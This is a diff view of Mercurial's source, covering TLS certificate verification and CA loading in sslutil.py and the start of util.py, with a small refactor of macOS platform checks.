397 397 # This is a no-op on old Python.
398 398 sslcontext.load_default_certs()
399 399 caloaded = True
400 400 else:
401 401 caloaded = False
402 402
403 403 try:
404 404 sslsocket = sslcontext.wrap_socket(sock, server_hostname=serverhostname)
405 405 except ssl.SSLError as e:
406 406 # If we're doing certificate verification and no CA certs are loaded,
407 407 # that is almost certainly the reason why verification failed. Provide
408 408 # a hint to the user.
409 409 # Only modern ssl module exposes SSLContext.get_ca_certs() so we can
410 410 # only show this warning if modern ssl is available.
411 411 # The exception handler is here to handle bugs around cert attributes:
412 412 # https://bugs.python.org/issue20916#msg213479. (See issues5313.)
413 413 # When the main 20916 bug occurs, 'sslcontext.get_ca_certs()' is a
414 414 # non-empty list, but the following conditional is otherwise True.
415 415 try:
416 416 if (caloaded and settings['verifymode'] == ssl.CERT_REQUIRED and
417 417 modernssl and not sslcontext.get_ca_certs()):
418 418 ui.warn(_('(an attempt was made to load CA certificates but '
419 419 'none were loaded; see '
420 420 'https://mercurial-scm.org/wiki/SecureConnections '
421 421 'for how to configure Mercurial to avoid this '
422 422 'error)\n'))
423 423 except ssl.SSLError:
424 424 pass
425 425 # Try to print more helpful error messages for known failures.
426 426 if util.safehasattr(e, 'reason'):
427 427 # This error occurs when the client and server don't share a
428 428 # common/supported SSL/TLS protocol. We've disabled SSLv2 and SSLv3
429 429 # outright. Hopefully the reason for this error is that we require
430 430 # TLS 1.1+ and the server only supports TLS 1.0. Whatever the
431 431 # reason, try to emit an actionable warning.
432 432 if e.reason == 'UNSUPPORTED_PROTOCOL':
433 433 # We attempted TLS 1.0+.
434 434 if settings['protocolui'] == 'tls1.0':
435 435 # We support more than just TLS 1.0+. If this happens,
436 436 # the likely scenario is either the client or the server
437 437 # is really old. (e.g. server doesn't support TLS 1.0+ or
438 438 # client doesn't support modern TLS versions introduced
439 439 # several years from when this comment was written).
440 440 if supportedprotocols != {'tls1.0'}:
441 441 ui.warn(_(
442 442 '(could not communicate with %s using security '
443 443 'protocols %s; if you are using a modern Mercurial '
444 444 'version, consider contacting the operator of this '
445 445 'server; see '
446 446 'https://mercurial-scm.org/wiki/SecureConnections '
447 447 'for more info)\n') % (
448 448 serverhostname,
449 449 ', '.join(sorted(supportedprotocols))))
450 450 else:
451 451 ui.warn(_(
452 452 '(could not communicate with %s using TLS 1.0; the '
453 453 'likely cause of this is the server no longer '
454 454 'supports TLS 1.0 because it has known security '
455 455 'vulnerabilities; see '
456 456 'https://mercurial-scm.org/wiki/SecureConnections '
457 457 'for more info)\n') % serverhostname)
458 458 else:
459 459 # We attempted TLS 1.1+. We can only get here if the client
460 460 # supports the configured protocol. So the likely reason is
461 461 # the client wants better security than the server can
462 462 # offer.
463 463 ui.warn(_(
464 464 '(could not negotiate a common security protocol (%s+) '
465 465 'with %s; the likely cause is Mercurial is configured '
466 466 'to be more secure than the server can support)\n') % (
467 467 settings['protocolui'], serverhostname))
468 468 ui.warn(_('(consider contacting the operator of this '
469 469 'server and ask them to support modern TLS '
470 470 'protocol versions; or, set '
471 471 'hostsecurity.%s:minimumprotocol=tls1.0 to allow '
472 472 'use of legacy, less secure protocols when '
473 473 'communicating with this server)\n') %
474 474 serverhostname)
475 475 ui.warn(_(
476 476 '(see https://mercurial-scm.org/wiki/SecureConnections '
477 477 'for more info)\n'))
478 478
479 479 elif (e.reason == 'CERTIFICATE_VERIFY_FAILED' and
480 480 pycompat.iswindows):
481 481
482 482 ui.warn(_('(the full certificate chain may not be available '
483 483 'locally; see "hg help debugssl")\n'))
484 484 raise
485 485
486 486 # check if wrap_socket failed silently because socket had been
487 487 # closed
488 488 # - see http://bugs.python.org/issue13721
489 489 if not sslsocket.cipher():
490 490 raise error.Abort(_('ssl connection failed'))
491 491
492 492 sslsocket._hgstate = {
493 493 'caloaded': caloaded,
494 494 'hostname': serverhostname,
495 495 'settings': settings,
496 496 'ui': ui,
497 497 }
498 498
499 499 return sslsocket
500 500
501 501 def wrapserversocket(sock, ui, certfile=None, keyfile=None, cafile=None,
502 502 requireclientcert=False):
503 503 """Wrap a socket for use by servers.
504 504
505 505 ``certfile`` and ``keyfile`` specify the files containing the certificate's
506 506 public and private keys, respectively. Both keys can be defined in the same
507 507 file via ``certfile`` (the private key must come first in the file).
508 508
509 509 ``cafile`` defines the path to certificate authorities.
510 510
511 511 ``requireclientcert`` specifies whether to require client certificates.
512 512
513 513 Typically ``cafile`` is only defined if ``requireclientcert`` is true.
514 514 """
515 515 # This function is not used much by core Mercurial, so the error messaging
516 516 # doesn't have to be as detailed as for wrapsocket().
517 517 for f in (certfile, keyfile, cafile):
518 518 if f and not os.path.exists(f):
519 519 raise error.Abort(_('referenced certificate file (%s) does not '
520 520 'exist') % f)
521 521
522 522 protocol, options, _protocolui = protocolsettings('tls1.0')
523 523
524 524 # This config option is intended for use in tests only. It is a giant
525 525 # footgun to kill security. Don't define it.
526 526 exactprotocol = ui.config('devel', 'serverexactprotocol')
527 527 if exactprotocol == 'tls1.0':
528 528 protocol = ssl.PROTOCOL_TLSv1
529 529 elif exactprotocol == 'tls1.1':
530 530 if 'tls1.1' not in supportedprotocols:
531 531 raise error.Abort(_('TLS 1.1 not supported by this Python'))
532 532 protocol = ssl.PROTOCOL_TLSv1_1
533 533 elif exactprotocol == 'tls1.2':
534 534 if 'tls1.2' not in supportedprotocols:
535 535 raise error.Abort(_('TLS 1.2 not supported by this Python'))
536 536 protocol = ssl.PROTOCOL_TLSv1_2
537 537 elif exactprotocol:
538 538 raise error.Abort(_('invalid value for serverexactprotocol: %s') %
539 539 exactprotocol)
540 540
541 541 if modernssl:
542 542 # We /could/ use create_default_context() here since it doesn't load
543 543 # CAs when configured for client auth. However, it is hard-coded to
544 544 # use ssl.PROTOCOL_SSLv23 which may not be appropriate here.
545 545 sslcontext = SSLContext(protocol)
546 546 sslcontext.options |= options
547 547
548 548 # Improve forward secrecy.
549 549 sslcontext.options |= getattr(ssl, 'OP_SINGLE_DH_USE', 0)
550 550 sslcontext.options |= getattr(ssl, 'OP_SINGLE_ECDH_USE', 0)
551 551
552 552 # Use the list of more secure ciphers if found in the ssl module.
553 553 if util.safehasattr(ssl, '_RESTRICTED_SERVER_CIPHERS'):
554 554 sslcontext.options |= getattr(ssl, 'OP_CIPHER_SERVER_PREFERENCE', 0)
555 555 sslcontext.set_ciphers(ssl._RESTRICTED_SERVER_CIPHERS)
556 556 else:
557 557 sslcontext = SSLContext(ssl.PROTOCOL_TLSv1)
558 558
559 559 if requireclientcert:
560 560 sslcontext.verify_mode = ssl.CERT_REQUIRED
561 561 else:
562 562 sslcontext.verify_mode = ssl.CERT_NONE
563 563
564 564 if certfile or keyfile:
565 565 sslcontext.load_cert_chain(certfile=certfile, keyfile=keyfile)
566 566
567 567 if cafile:
568 568 sslcontext.load_verify_locations(cafile=cafile)
569 569
570 570 return sslcontext.wrap_socket(sock, server_side=True)
571 571
572 572 class wildcarderror(Exception):
573 573 """Represents an error parsing wildcards in DNS name."""
574 574
575 575 def _dnsnamematch(dn, hostname, maxwildcards=1):
576 576 """Match DNS names according RFC 6125 section 6.4.3.
577 577
578 578 This code is effectively copied from CPython's ssl._dnsname_match.
579 579
580 580 Returns a bool indicating whether the expected hostname matches
581 581 the value in ``dn``.
582 582 """
583 583 pats = []
584 584 if not dn:
585 585 return False
586 586
587 587 pieces = dn.split(r'.')
588 588 leftmost = pieces[0]
589 589 remainder = pieces[1:]
590 590 wildcards = leftmost.count('*')
591 591 if wildcards > maxwildcards:
592 592 raise wildcarderror(
593 593 _('too many wildcards in certificate DNS name: %s') % dn)
594 594
595 595 # speed up common case w/o wildcards
596 596 if not wildcards:
597 597 return dn.lower() == hostname.lower()
598 598
599 599 # RFC 6125, section 6.4.3, subitem 1.
600 600 # The client SHOULD NOT attempt to match a presented identifier in which
601 601 # the wildcard character comprises a label other than the left-most label.
602 602 if leftmost == '*':
603 603 # When '*' is a fragment by itself, it matches a non-empty dotless
604 604 # fragment.
605 605 pats.append('[^.]+')
606 606 elif leftmost.startswith('xn--') or hostname.startswith('xn--'):
607 607 # RFC 6125, section 6.4.3, subitem 3.
608 608 # The client SHOULD NOT attempt to match a presented identifier
609 609 # where the wildcard character is embedded within an A-label or
610 610 # U-label of an internationalized domain name.
611 611 pats.append(re.escape(leftmost))
612 612 else:
613 613 # Otherwise, '*' matches any dotless string, e.g. www*
614 614 pats.append(re.escape(leftmost).replace(r'\*', '[^.]*'))
615 615
616 616 # add the remaining fragments, ignore any wildcards
617 617 for frag in remainder:
618 618 pats.append(re.escape(frag))
619 619
620 620 pat = re.compile(r'\A' + r'\.'.join(pats) + r'\Z', re.IGNORECASE)
621 621 return pat.match(hostname) is not None
622 622
623 623 def _verifycert(cert, hostname):
624 624 '''Verify that cert (in socket.getpeercert() format) matches hostname.
625 625 CRLs is not handled.
626 626
627 627 Returns error message if any problems are found and None on success.
628 628 '''
629 629 if not cert:
630 630 return _('no certificate received')
631 631
632 632 dnsnames = []
633 633 san = cert.get('subjectAltName', [])
634 634 for key, value in san:
635 635 if key == 'DNS':
636 636 try:
637 637 if _dnsnamematch(value, hostname):
638 638 return
639 639 except wildcarderror as e:
640 640 return e.args[0]
641 641
642 642 dnsnames.append(value)
643 643
644 644 if not dnsnames:
645 645 # The subject is only checked when there is no DNS in subjectAltName.
646 646 for sub in cert.get('subject', []):
647 647 for key, value in sub:
648 648 # According to RFC 2818 the most specific Common Name must
649 649 # be used.
650 650 if key == 'commonName':
651 651 # 'subject' entries are unicode.
652 652 try:
653 653 value = value.encode('ascii')
654 654 except UnicodeEncodeError:
655 655 return _('IDN in certificate not supported')
656 656
657 657 try:
658 658 if _dnsnamematch(value, hostname):
659 659 return
660 660 except wildcarderror as e:
661 661 return e.args[0]
662 662
663 663 dnsnames.append(value)
664 664
665 665 if len(dnsnames) > 1:
666 666 return _('certificate is for %s') % ', '.join(dnsnames)
667 667 elif len(dnsnames) == 1:
668 668 return _('certificate is for %s') % dnsnames[0]
669 669 else:
670 670 return _('no commonName or subjectAltName found in certificate')
671 671
672 672 def _plainapplepython():
673 673 """return true if this seems to be a pure Apple Python that
674 674 * is unfrozen and presumably has the whole mercurial module in the file
675 675 system
676 676 * presumably is an Apple Python that uses Apple OpenSSL which has patches
677 677 for using system certificate store CAs in addition to the provided
678 678 cacerts file
679 679 """
680 if (pycompat.sysplatform != 'darwin' or
681 util.mainfrozen() or not pycompat.sysexecutable):
680 if (not pycompat.isdarwin or util.mainfrozen() or
681 not pycompat.sysexecutable):
682 682 return False
683 683 exe = os.path.realpath(pycompat.sysexecutable).lower()
684 684 return (exe.startswith('/usr/bin/python') or
685 685 exe.startswith('/system/library/frameworks/python.framework/'))
686 686
687 687 _systemcacertpaths = [
688 688 # RHEL, CentOS, and Fedora
689 689 '/etc/pki/tls/certs/ca-bundle.trust.crt',
690 690 # Debian, Ubuntu, Gentoo
691 691 '/etc/ssl/certs/ca-certificates.crt',
692 692 ]
693 693
694 694 def _defaultcacerts(ui):
695 695 """return path to default CA certificates or None.
696 696
697 697 It is assumed this function is called when the returned certificates
698 698 file will actually be used to validate connections. Therefore this
699 699 function may print warnings or debug messages assuming this usage.
700 700
701 701 We don't print a message when the Python is able to load default
702 702 CA certs because this scenario is detected at socket connect time.
703 703 """
704 704 # The "certifi" Python package provides certificates. If it is installed
705 705 # and usable, assume the user intends it to be used and use it.
706 706 try:
707 707 import certifi
708 708 certs = certifi.where()
709 709 if os.path.exists(certs):
710 710 ui.debug('using ca certificates from certifi\n')
711 711 return certs
712 712 except (ImportError, AttributeError):
713 713 pass
714 714
715 715 # On Windows, only the modern ssl module is capable of loading the system
716 716 # CA certificates. If we're not capable of doing that, emit a warning
717 717 # because we'll get a certificate verification error later and the lack
718 718 # of loaded CA certificates will be the reason why.
719 719 # Assertion: this code is only called if certificates are being verified.
720 720 if pycompat.iswindows:
721 721 if not _canloaddefaultcerts:
722 722 ui.warn(_('(unable to load Windows CA certificates; see '
723 723 'https://mercurial-scm.org/wiki/SecureConnections for '
724 724 'how to configure Mercurial to avoid this message)\n'))
725 725
726 726 return None
727 727
728 728 # Apple's OpenSSL has patches that allow a specially constructed certificate
729 729 # to load the system CA store. If we're running on Apple Python, use this
730 730 # trick.
731 731 if _plainapplepython():
732 732 dummycert = os.path.join(
733 733 os.path.dirname(pycompat.fsencode(__file__)), 'dummycert.pem')
734 734 if os.path.exists(dummycert):
735 735 return dummycert
736 736
737 737 # The Apple OpenSSL trick isn't available to us. If Python isn't able to
738 738 # load system certs, we're out of luck.
739 if pycompat.sysplatform == 'darwin':
739 if pycompat.isdarwin:
740 740 # FUTURE Consider looking for Homebrew or MacPorts installed certs
741 741 # files. Also consider exporting the keychain certs to a file during
742 742 # Mercurial install.
743 743 if not _canloaddefaultcerts:
744 744 ui.warn(_('(unable to load CA certificates; see '
745 745 'https://mercurial-scm.org/wiki/SecureConnections for '
746 746 'how to configure Mercurial to avoid this message)\n'))
747 747 return None
748 748
749 749 # / is writable on Windows. Out of an abundance of caution make sure
750 750 # we're not on Windows because paths from _systemcacerts could be installed
751 751 # by non-admin users.
752 752 assert not pycompat.iswindows
753 753
754 754 # Try to find CA certificates in well-known locations. We print a warning
755 755 # when using a found file because we don't want too much silent magic
756 756 # for security settings. The expectation is that proper Mercurial
757 757 # installs will have the CA certs path defined at install time and the
758 758 # installer/packager will make an appropriate decision on the user's
759 759 # behalf. We only get here and perform this setting as a feature of
760 760 # last resort.
761 761 if not _canloaddefaultcerts:
762 762 for path in _systemcacertpaths:
763 763 if os.path.isfile(path):
764 764 ui.warn(_('(using CA certificates from %s; if you see this '
765 765 'message, your Mercurial install is not properly '
766 766 'configured; see '
767 767 'https://mercurial-scm.org/wiki/SecureConnections '
768 768 'for how to configure Mercurial to avoid this '
769 769 'message)\n') % path)
770 770 return path
771 771
772 772 ui.warn(_('(unable to load CA certificates; see '
773 773 'https://mercurial-scm.org/wiki/SecureConnections for '
774 774 'how to configure Mercurial to avoid this message)\n'))
775 775
776 776 return None
777 777
778 778 def validatesocket(sock):
779 779 """Validate a socket meets security requirements.
780 780
781 781 The passed socket must have been created with ``wrapsocket()``.
782 782 """
783 783 host = sock._hgstate['hostname']
784 784 ui = sock._hgstate['ui']
785 785 settings = sock._hgstate['settings']
786 786
787 787 try:
788 788 peercert = sock.getpeercert(True)
789 789 peercert2 = sock.getpeercert()
790 790 except AttributeError:
791 791 raise error.Abort(_('%s ssl connection error') % host)
792 792
793 793 if not peercert:
794 794 raise error.Abort(_('%s certificate error: '
795 795 'no certificate received') % host)
796 796
797 797 if settings['disablecertverification']:
798 798 # We don't print the certificate fingerprint because it shouldn't
799 799 # be necessary: if the user requested certificate verification be
800 800 # disabled, they presumably already saw a message about the inability
801 801 # to verify the certificate and this message would have printed the
802 802 # fingerprint. So printing the fingerprint here adds little to no
803 803 # value.
804 804 ui.warn(_('warning: connection security to %s is disabled per current '
805 805 'settings; communication is susceptible to eavesdropping '
806 806 'and tampering\n') % host)
807 807 return
808 808
809 809 # If a certificate fingerprint is pinned, use it and only it to
810 810 # validate the remote cert.
811 811 peerfingerprints = {
812 812 'sha1': hashlib.sha1(peercert).hexdigest(),
813 813 'sha256': hashlib.sha256(peercert).hexdigest(),
814 814 'sha512': hashlib.sha512(peercert).hexdigest(),
815 815 }
816 816
817 817 def fmtfingerprint(s):
818 818 return ':'.join([s[x:x + 2] for x in range(0, len(s), 2)])
819 819
820 820 nicefingerprint = 'sha256:%s' % fmtfingerprint(peerfingerprints['sha256'])
821 821
822 822 if settings['certfingerprints']:
823 823 for hash, fingerprint in settings['certfingerprints']:
824 824 if peerfingerprints[hash].lower() == fingerprint:
825 825 ui.debug('%s certificate matched fingerprint %s:%s\n' %
826 826 (host, hash, fmtfingerprint(fingerprint)))
827 827 if settings['legacyfingerprint']:
828 828 ui.warn(_('(SHA-1 fingerprint for %s found in legacy '
829 829 '[hostfingerprints] section; '
830 830 'if you trust this fingerprint, remove the old '
831 831 'SHA-1 fingerprint from [hostfingerprints] and '
832 832 'add the following entry to the new '
833 833 '[hostsecurity] section: %s:fingerprints=%s)\n') %
834 834 (host, host, nicefingerprint))
835 835 return
836 836
837 837 # Pinned fingerprint didn't match. This is a fatal error.
838 838 if settings['legacyfingerprint']:
839 839 section = 'hostfingerprint'
840 840 nice = fmtfingerprint(peerfingerprints['sha1'])
841 841 else:
842 842 section = 'hostsecurity'
843 843 nice = '%s:%s' % (hash, fmtfingerprint(peerfingerprints[hash]))
844 844 raise error.Abort(_('certificate for %s has unexpected '
845 845 'fingerprint %s') % (host, nice),
846 846 hint=_('check %s configuration') % section)
847 847
848 848 # Security is enabled but no CAs are loaded. We can't establish trust
849 849 # for the cert so abort.
850 850 if not sock._hgstate['caloaded']:
851 851 raise error.Abort(
852 852 _('unable to verify security of %s (no loaded CA certificates); '
853 853 'refusing to connect') % host,
854 854 hint=_('see https://mercurial-scm.org/wiki/SecureConnections for '
855 855 'how to configure Mercurial to avoid this error or set '
856 856 'hostsecurity.%s:fingerprints=%s to trust this server') %
857 857 (host, nicefingerprint))
858 858
859 859 msg = _verifycert(peercert2, host)
860 860 if msg:
861 861 raise error.Abort(_('%s certificate error: %s') % (host, msg),
862 862 hint=_('set hostsecurity.%s:certfingerprints=%s '
863 863 'config setting or use --insecure to connect '
864 864 'insecurely') %
865 865 (host, nicefingerprint))
@@ -1,3861 +1,3861 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import itertools
30 30 import mmap
31 31 import os
32 32 import platform as pyplatform
33 33 import re as remod
34 34 import shutil
35 35 import signal
36 36 import socket
37 37 import stat
38 38 import string
39 39 import subprocess
40 40 import sys
41 41 import tempfile
42 42 import textwrap
43 43 import time
44 44 import traceback
45 45 import warnings
46 46 import zlib
47 47
48 48 from . import (
49 49 encoding,
50 50 error,
51 51 i18n,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 empty = pycompat.empty
66 66 httplib = pycompat.httplib
67 67 pickle = pycompat.pickle
68 68 queue = pycompat.queue
69 69 socketserver = pycompat.socketserver
70 70 stderr = pycompat.stderr
71 71 stdin = pycompat.stdin
72 72 stdout = pycompat.stdout
73 73 stringio = pycompat.stringio
74 74 xmlrpclib = pycompat.xmlrpclib
75 75
76 76 httpserver = urllibcompat.httpserver
77 77 urlerr = urllibcompat.urlerr
78 78 urlreq = urllibcompat.urlreq
79 79
80 80 # workaround for win32mbcs
81 81 _filenamebytestr = pycompat.bytestr
82 82
83 83 def isatty(fp):
84 84 try:
85 85 return fp.isatty()
86 86 except AttributeError:
87 87 return False
88 88
89 89 # glibc determines buffering on first write to stdout - if we replace a TTY
90 90 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 91 # buffering
92 92 if isatty(stdout):
93 93 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94 94
95 95 if pycompat.iswindows:
96 96 from . import windows as platform
97 97 stdout = platform.winstdout(stdout)
98 98 else:
99 99 from . import posix as platform
100 100
101 101 _ = i18n._
102 102
103 103 bindunixsocket = platform.bindunixsocket
104 104 cachestat = platform.cachestat
105 105 checkexec = platform.checkexec
106 106 checklink = platform.checklink
107 107 copymode = platform.copymode
108 108 executablepath = platform.executablepath
109 109 expandglobs = platform.expandglobs
110 110 explainexit = platform.explainexit
111 111 findexe = platform.findexe
112 112 gethgcmd = platform.gethgcmd
113 113 getuser = platform.getuser
114 114 getpid = os.getpid
115 115 groupmembers = platform.groupmembers
116 116 groupname = platform.groupname
117 117 hidewindow = platform.hidewindow
118 118 isexec = platform.isexec
119 119 isowner = platform.isowner
120 120 listdir = osutil.listdir
121 121 localpath = platform.localpath
122 122 lookupreg = platform.lookupreg
123 123 makedir = platform.makedir
124 124 nlinks = platform.nlinks
125 125 normpath = platform.normpath
126 126 normcase = platform.normcase
127 127 normcasespec = platform.normcasespec
128 128 normcasefallback = platform.normcasefallback
129 129 openhardlinks = platform.openhardlinks
130 130 oslink = platform.oslink
131 131 parsepatchoutput = platform.parsepatchoutput
132 132 pconvert = platform.pconvert
133 133 poll = platform.poll
134 134 popen = platform.popen
135 135 posixfile = platform.posixfile
136 136 quotecommand = platform.quotecommand
137 137 readpipe = platform.readpipe
138 138 rename = platform.rename
139 139 removedirs = platform.removedirs
140 140 samedevice = platform.samedevice
141 141 samefile = platform.samefile
142 142 samestat = platform.samestat
143 143 setbinary = platform.setbinary
144 144 setflags = platform.setflags
145 145 setsignalhandler = platform.setsignalhandler
146 146 shellquote = platform.shellquote
147 147 spawndetached = platform.spawndetached
148 148 split = platform.split
149 149 sshargs = platform.sshargs
150 150 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
151 151 statisexec = platform.statisexec
152 152 statislink = platform.statislink
153 153 testpid = platform.testpid
154 154 umask = platform.umask
155 155 unlink = platform.unlink
156 156 username = platform.username
157 157
158 158 try:
159 159 recvfds = osutil.recvfds
160 160 except AttributeError:
161 161 pass
162 162 try:
163 163 setprocname = osutil.setprocname
164 164 except AttributeError:
165 165 pass
166 166
167 167 # Python compatibility
168 168
169 169 _notset = object()
170 170
171 171 # disable Python's problematic floating point timestamps (issue4836)
172 172 # (Python hypocritically says you shouldn't change this behavior in
173 173 # libraries, and sure enough Mercurial is not a library.)
174 174 os.stat_float_times(False)
175 175
176 176 def safehasattr(thing, attr):
177 177 return getattr(thing, attr, _notset) is not _notset
178 178
179 179 def bytesinput(fin, fout, *args, **kwargs):
180 180 sin, sout = sys.stdin, sys.stdout
181 181 try:
182 182 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
183 183 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
184 184 finally:
185 185 sys.stdin, sys.stdout = sin, sout
186 186
187 187 def bitsfrom(container):
188 188 bits = 0
189 189 for bit in container:
190 190 bits |= bit
191 191 return bits
192 192
193 193 # python 2.6 still have deprecation warning enabled by default. We do not want
194 194 # to display anything to standard user so detect if we are running test and
195 195 # only use python deprecation warning in this case.
196 196 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
197 197 if _dowarn:
198 198 # explicitly unfilter our warning for python 2.7
199 199 #
200 200 # The option of setting PYTHONWARNINGS in the test runner was investigated.
201 201 # However, module name set through PYTHONWARNINGS was exactly matched, so
202 202 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
203 203 # makes the whole PYTHONWARNINGS thing useless for our usecase.
204 204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
205 205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
206 206 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
207 207
208 208 def nouideprecwarn(msg, version, stacklevel=1):
209 209 """Issue an python native deprecation warning
210 210
211 211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 212 """
213 213 if _dowarn:
214 214 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
215 215 " update your code.)") % version
216 216 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
217 217
218 218 DIGESTS = {
219 219 'md5': hashlib.md5,
220 220 'sha1': hashlib.sha1,
221 221 'sha512': hashlib.sha512,
222 222 }
223 223 # List of digest types from strongest to weakest
224 224 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
225 225
226 226 for k in DIGESTS_BY_STRENGTH:
227 227 assert k in DIGESTS
228 228
229 229 class digester(object):
230 230 """helper to compute digests.
231 231
232 232 This helper can be used to compute one or more digests given their name.
233 233
234 234 >>> d = digester([b'md5', b'sha1'])
235 235 >>> d.update(b'foo')
236 236 >>> [k for k in sorted(d)]
237 237 ['md5', 'sha1']
238 238 >>> d[b'md5']
239 239 'acbd18db4cc2f85cedef654fccc4a4d8'
240 240 >>> d[b'sha1']
241 241 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
242 242 >>> digester.preferred([b'md5', b'sha1'])
243 243 'sha1'
244 244 """
245 245
246 246 def __init__(self, digests, s=''):
247 247 self._hashes = {}
248 248 for k in digests:
249 249 if k not in DIGESTS:
250 250 raise Abort(_('unknown digest type: %s') % k)
251 251 self._hashes[k] = DIGESTS[k]()
252 252 if s:
253 253 self.update(s)
254 254
255 255 def update(self, data):
256 256 for h in self._hashes.values():
257 257 h.update(data)
258 258
259 259 def __getitem__(self, key):
260 260 if key not in DIGESTS:
261 261 raise Abort(_('unknown digest type: %s') % k)
262 262 return self._hashes[key].hexdigest()
263 263
264 264 def __iter__(self):
265 265 return iter(self._hashes)
266 266
267 267 @staticmethod
268 268 def preferred(supported):
269 269 """returns the strongest digest type in both supported and DIGESTS."""
270 270
271 271 for k in DIGESTS_BY_STRENGTH:
272 272 if k in supported:
273 273 return k
274 274 return None
275 275
276 276 class digestchecker(object):
277 277 """file handle wrapper that additionally checks content against a given
278 278 size and digests.
279 279
280 280 d = digestchecker(fh, size, {'md5': '...'})
281 281
282 282 When multiple digests are given, all of them are validated.
283 283 """
284 284
285 285 def __init__(self, fh, size, digests):
286 286 self._fh = fh
287 287 self._size = size
288 288 self._got = 0
289 289 self._digests = dict(digests)
290 290 self._digester = digester(self._digests.keys())
291 291
292 292 def read(self, length=-1):
293 293 content = self._fh.read(length)
294 294 self._digester.update(content)
295 295 self._got += len(content)
296 296 return content
297 297
298 298 def validate(self):
299 299 if self._size != self._got:
300 300 raise Abort(_('size mismatch: expected %d, got %d') %
301 301 (self._size, self._got))
302 302 for k, v in self._digests.items():
303 303 if v != self._digester[k]:
304 304 # i18n: first parameter is a digest name
305 305 raise Abort(_('%s mismatch: expected %s, got %s') %
306 306 (k, v, self._digester[k]))
307 307
308 308 try:
309 309 buffer = buffer
310 310 except NameError:
311 311 def buffer(sliceable, offset=0, length=None):
312 312 if length is not None:
313 313 return memoryview(sliceable)[offset:offset + length]
314 314 return memoryview(sliceable)[offset:]
315 315
316 316 closefds = pycompat.isposix
317 317
318 318 _chunksize = 4096
319 319
320 320 class bufferedinputpipe(object):
321 321 """a manually buffered input pipe
322 322
323 323 Python will not let us use buffered IO and lazy reading with 'polling' at
324 324 the same time. We cannot probe the buffer state and select will not detect
325 325 that data are ready to read if they are already buffered.
326 326
327 327 This class let us work around that by implementing its own buffering
328 328 (allowing efficient readline) while offering a way to know if the buffer is
329 329 empty from the output (allowing collaboration of the buffer with polling).
330 330
331 331 This class lives in the 'util' module because it makes use of the 'os'
332 332 module from the python stdlib.
333 333 """
334 334
335 335 def __init__(self, input):
336 336 self._input = input
337 337 self._buffer = []
338 338 self._eof = False
339 339 self._lenbuf = 0
340 340
341 341 @property
342 342 def hasbuffer(self):
343 343 """True is any data is currently buffered
344 344
345 345 This will be used externally a pre-step for polling IO. If there is
346 346 already data then no polling should be set in place."""
347 347 return bool(self._buffer)
348 348
349 349 @property
350 350 def closed(self):
351 351 return self._input.closed
352 352
353 353 def fileno(self):
354 354 return self._input.fileno()
355 355
356 356 def close(self):
357 357 return self._input.close()
358 358
359 359 def read(self, size):
360 360 while (not self._eof) and (self._lenbuf < size):
361 361 self._fillbuffer()
362 362 return self._frombuffer(size)
363 363
364 364 def readline(self, *args, **kwargs):
365 365 if 1 < len(self._buffer):
366 366 # this should not happen because both read and readline end with a
367 367 # _frombuffer call that collapse it.
368 368 self._buffer = [''.join(self._buffer)]
369 369 self._lenbuf = len(self._buffer[0])
370 370 lfi = -1
371 371 if self._buffer:
372 372 lfi = self._buffer[-1].find('\n')
373 373 while (not self._eof) and lfi < 0:
374 374 self._fillbuffer()
375 375 if self._buffer:
376 376 lfi = self._buffer[-1].find('\n')
377 377 size = lfi + 1
378 378 if lfi < 0: # end of file
379 379 size = self._lenbuf
380 380 elif 1 < len(self._buffer):
381 381 # we need to take previous chunks into account
382 382 size += self._lenbuf - len(self._buffer[-1])
383 383 return self._frombuffer(size)
384 384
385 385 def _frombuffer(self, size):
386 386 """return at most 'size' data from the buffer
387 387
388 388 The data are removed from the buffer."""
389 389 if size == 0 or not self._buffer:
390 390 return ''
391 391 buf = self._buffer[0]
392 392 if 1 < len(self._buffer):
393 393 buf = ''.join(self._buffer)
394 394
395 395 data = buf[:size]
396 396 buf = buf[len(data):]
397 397 if buf:
398 398 self._buffer = [buf]
399 399 self._lenbuf = len(buf)
400 400 else:
401 401 self._buffer = []
402 402 self._lenbuf = 0
403 403 return data
404 404
405 405 def _fillbuffer(self):
406 406 """read data to the buffer"""
407 407 data = os.read(self._input.fileno(), _chunksize)
408 408 if not data:
409 409 self._eof = True
410 410 else:
411 411 self._lenbuf += len(data)
412 412 self._buffer.append(data)
413 413
414 414 def mmapread(fp):
415 415 try:
416 416 fd = getattr(fp, 'fileno', lambda: fp)()
417 417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
418 418 except ValueError:
419 419 # Empty files cannot be mmapped, but mmapread should still work. Check
